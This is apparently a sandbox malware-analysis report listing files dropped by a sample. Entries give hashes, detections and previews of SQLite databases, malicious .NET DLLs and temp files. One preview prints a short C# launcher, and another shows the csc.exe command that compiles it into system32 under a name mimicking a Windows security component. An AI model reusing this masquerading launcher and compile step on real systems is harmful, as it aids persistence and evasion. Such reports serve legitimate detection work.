                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x32onlvs.5ls.psm1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xeh2t2h1.cw2.psm1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ytp1ab2z.jkb.psm1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z2ctmi5o.nio.ps1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5lyytdd.czd.psm1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\bfKv5IzLwm

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):106496
                                                                                                                                    Entropy (8bit):1.1358696453229276
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\diMaNMPA1O

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):114688
                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.0.cs

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):424
                                                                                                                                    Entropy (8bit):5.1173838837912085
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6H+sddsfRiFkD:JNVQIbSfhV7TiFkMSfhWH+svsf4FkD
                                                                                                                                    MD5:81AECD38F24EF1E03485CFF5F0A1C964
                                                                                                                                    SHA1:8EE1A50966720EEF47C8B0016725AE96FB58CEE9
                                                                                                                                    SHA-256:EF4C2683B75B553C1A4699EBA9FD65947C561E61AE8D607114A3F70E50FCC4E4
                                                                                                                                    SHA-512:41C833A7649371BEE36247395FA3CDE8B15C5D44A4D0F9B379A8D5019085F30E3411A48F9BDAA1C6FDCB698A0D2441B180BEC1871D058E23DD42C51444187738
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe"); } catch { } }).Start();. }.}.

                                                                                                                                    C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):250
                                                                                                                                    Entropy (8bit):5.0902373250756705
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fVVDH:Hu7L//TRq79cQWfNdH
                                                                                                                                    MD5:2E81ECD0DA70073B0C69D919DC587A6E
                                                                                                                                    SHA1:4EE202522A6B94A6D6C1768D43C4E3748DCD9CDF
                                                                                                                                    SHA-256:6EBE15B3FABF2D3365983ADB8C5B22D611D26C61F7D50AE72D9499A1993D6CA9
                                                                                                                                    SHA-512:1AB7F5C61BF54114D73CB9DE0393F5A49F305313F75CCC3AE9E0476C24E605B9A9D389264D415F527179AA8CD50A6A9795A20B118250B6EF05FD61BCABD6EFCD
                                                                                                                                    Malicious:true
                                                                                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.0.cs"

                                                                                                                                    C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.out

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                                                                                    Category:modified
                                                                                                                                    Size (bytes):750
                                                                                                                                    Entropy (8bit):5.261212638967308
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:KJN/I/u7L//TRq79cQWfNdOKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWfNgKax5DqBVKVrdFAw
                                                                                                                                    MD5:77A94EBD01B96CFCB9433A79E7157A20
                                                                                                                                    SHA1:6B3C74E7F164F5E6037873A9E7FD7DD32329AA1E
                                                                                                                                    SHA-256:309ED2DE43B38B2CAC3ABD7E26FCF0F4AE22D04F6B0C63D77443EACC55C6C34F
                                                                                                                                    SHA-512:36893CCDFA556E0975FAB4E2342357DF6A6CB40923D64DA9B80D06B41FE7170E84CF44B1876DD9BB15056DEFAEBCC0A115C943CA69C21880A7AC8C1F7F8F3542
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                    C:\Users\user\AppData\Local\Temp\pxc2XMkTJC

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):25
                                                                                                                                    Entropy (8bit):4.103465189601645
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:QsWSk6L:Qs26L
                                                                                                                                    MD5:6D9DE2497B85EEC2D838184850B6B532
                                                                                                                                    SHA1:3DF4611D793BD41032AF8C15A04054D186D1F262
                                                                                                                                    SHA-256:58CA9A6962D439F82D6EEE40F7BF3B64DFF0A48B3A5280BA974D548ECBB81CCB
                                                                                                                                    SHA-512:2C746A7360CD993267B701088214D51F8E1C492148C75DAED64A512002C2367517B616BA222178F351F06ACF19A264DADECCC23D2182A7CEBE89C392EEE9F070
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:xhxoKdfsty84wH7vMz7eKdd17

                                                                                                                                    C:\Users\user\AppData\Local\Temp\qBblIcQZVX

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):20480
                                                                                                                                    Entropy (8bit):0.5707520969659783
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\r4ucDo0X0I

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):28672
                                                                                                                                    Entropy (8bit):2.5793180405395284
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\r7zZErtjMt

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):25
                                                                                                                                    Entropy (8bit):4.323856189774724
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:GWKtElD:R
                                                                                                                                    MD5:7A0EA4D818806ACD9568F682B0E632E2
                                                                                                                                    SHA1:8B2BDB6F9CF15390DB9E9480C39B3D9C230315C5
                                                                                                                                    SHA-256:98A3271F992CC62DCFC22C7FF57928486D710F4310D01268F7BB6543C154446F
                                                                                                                                    SHA-512:371299FC859501224DA326D838DDE1B0714B5553090A705152A3FA65281A15C2C4E4A82B955FDDA5488D52EC150F266AB13A00FC287A2BC3B3F1967793AA103F
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:coQjZ96rg9EB3obhaJfRLlgZY

                                                                                                                                    C:\Users\user\AppData\Local\Temp\rqqtMN36Ye

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):49152
                                                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\sebuO9IfXr

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):20480
                                                                                                                                    Entropy (8bit):0.5712781801655107
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\uAV4mAvWp2

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):20480
                                                                                                                                    Entropy (8bit):0.5707520969659783
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\BazpdGXT.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):85504
                                                                                                                                    Entropy (8bit):5.8769270258874755
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                    Joe Sandbox View:
                                                                                                                                    • Filename: 8CDSiIApNr.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: 3otr19d5Oq.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: idYLOQOVSi.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: ZAF4Dsu737.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: mbsPX9l9Ge.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: nxs4if1qOO.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: crsa4bZhdH.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: C9EBSy2FG0.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: y3HHIzAW6R.exe, Detection: malicious, Browse
                                                                                                                                    • Filename: SecuriteInfo.com.HEUR.Trojan.MSIL.Agent.gen.4285.13890.exe, Detection: malicious, Browse
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                                    C:\Users\user\Desktop\BuKwfPUT.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):23552
                                                                                                                                    Entropy (8bit):5.519109060441589
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\DEgxfiAU.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):9728
                                                                                                                                    Entropy (8bit):5.0168086460579095
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                                                    MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                                                    SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                                                    SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                                                    SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

                                                                                                                                    C:\Users\user\Desktop\EkAnmMVM.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):85504
                                                                                                                                    Entropy (8bit):5.8769270258874755
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
